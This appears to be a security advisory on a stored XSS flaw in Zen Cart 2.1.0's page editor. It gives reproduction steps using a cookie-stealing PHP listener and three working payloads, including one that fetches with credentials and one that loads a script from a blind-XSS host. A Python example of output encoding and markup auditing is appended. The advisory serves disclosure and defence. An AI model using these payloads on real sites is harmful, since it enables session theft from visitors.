Zencart | Stored XSS on Page Editor

Information

Software Type: Web App
Software Name: Zen-Cart
Affected Version: 2.1.0
Software Vendor: Zen Ventures, LLC
Software Link: https://github.com/zencart/zencart
Severity: High
CVSS Score: 7.2
CVE Link: N/A
Affected Assets: 30171+
Date of Discovery: Jan 9th, 2025
PoC Exploit: https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd

Description

Zencart has an interesting feature that lets administrators change the text editor used across the website for editing pages and products, choosing between a “Plain text” editor and “CKEditor”.

The problem is that when the plain-text editor is selected for modifying pages, HTML and JavaScript can still be injected, which a plain-text editor should never allow: its content should be treated as data and encoded on output, not rendered as markup.

The define-pages editor at [/index.php?cmd=define_pages_editor] lets you modify the source of several storefront pages. Malicious code injected into any of these pages is stored and executed silently in the browser of every visitor who loads that page.


Reproduce

To reproduce the issue, I am going to use a PHP cookie stealer script to demonstrate how this vulnerability can be used to steal cookies.

Save the following file as capture.php:

https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd

Launch a PHP server to serve this file:

> php -S 0.0.0.0:1718


Next, log in to Zencart as an administrator and navigate to the define-pages editor:

http://127.0.0.1/zencart/Horse-Kgc-fRizz/index.php?cmd=define_pages_editor

Select the page you would like to modify; in my case it's going to be the define_contact_us.php page. By default, your text editor should be “Plain Text”, and you don't need to change that.

Write the following payload in the input field containing the source code of define_contact_us.php:

<img src='http://127.0.0.1:1718/capture.php' alt="" height="" width="">


Now, you can visit the contact endpoint:

http://127.0.0.1/zencart/index.php?main_page=contact_us

Loading that page makes the visitor's browser issue the injected request to capture.php, which results in cookie theft.

The following payloads also work:

<img src="x" onerror="fetch('http://127.0.0.1:1718/capture.php', {credentials: 'include'})">
<script src=https://your-instance.bxss.in></script>
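The two points above, that content saved through the “Plain Text” editor is emitted as live HTML and that the injected markup takes a few recognisable shapes, as an added example in Python (this is not Zen Cart's own code, which is PHP). It shows the raw rendering the advisory describes beside the hardened form that HTML-encodes a plain-text page on output (the PHP equivalent is htmlspecialchars() with ENT_QUOTES), and a small audit that flags stored page bodies containing active markup. The sample page content, the page name and the audit patterns are constructed for illustration.

```python
"""Added example, not Zen Cart's own code: output encoding for a plain-text page
versus the raw rendering the advisory describes, plus an audit of stored page bodies."""
import html
import re

# Constructed sample of what gets typed into the "Plain Text" editor for a page.
# The second line is the image payload shape quoted in the advisory.
CONSTRUCTED_PAGE_CONTENT = (
    "Reach us by phone or email.\n"
    "<img src='http://127.0.0.1:1718/capture.php' alt=\"\" height=\"\" width=\"\">\n"
)


def render_vulnerable(stored: str) -> str:
    """Behaviour the advisory reports: the stored text is emitted verbatim,
    so any markup in it becomes live HTML for every visitor."""
    return f"<div class=\"page-body\">{stored}</div>"


def render_plaintext(stored: str) -> str:
    """Hardened form: a plain-text page is data, not markup, so it is HTML-encoded
    at output. In PHP the equivalent call is htmlspecialchars($s, ENT_QUOTES, 'UTF-8')."""
    return f"<div class=\"page-body\">{html.escape(stored, quote=True)}</div>"


# Indicators of active content that has no business in a page edited as plain text.
# Constructed for this example; tune the patterns before relying on them as a rule.
ACTIVE_MARKUP = re.compile(
    r"<\s*script\b"                                  # script elements
    r"|<[a-z][^>]*\son[a-z]+\s*="                    # inline event handlers (onerror=, onload=, ...)
    r"|<\s*(?:img|iframe|object|embed|source)\b[^>]*\bsrc\s*=\s*['\"]?\s*(?:https?:)?//",  # remote loads
    re.IGNORECASE,
)


def audit_stored_page(page_name: str, stored: str) -> list:
    """Return one finding string per suspicious fragment, tagged with its line number."""
    findings = []
    for match in ACTIVE_MARKUP.finditer(stored):
        line_no = stored.count("\n", 0, match.start()) + 1
        findings.append(f"{page_name}:{line_no}: active markup: {match.group(0)[:60]}")
    return findings


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(CONSTRUCTED_PAGE_CONTENT))
    print("hardened:  ", render_plaintext(CONSTRUCTED_PAGE_CONTENT))
    for finding in audit_stored_page("define_contact_us.php", CONSTRUCTED_PAGE_CONTENT):
        print(finding)
```

The audit is a triage aid for content already saved through the editor, not a substitute for the fix: encoding on output is what closes the hole, because it makes the stored text harmless regardless of which patterns the audit knows about.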


Proof of Concept (PoC) Video


Posted on: May 24, 2025 05:53 AM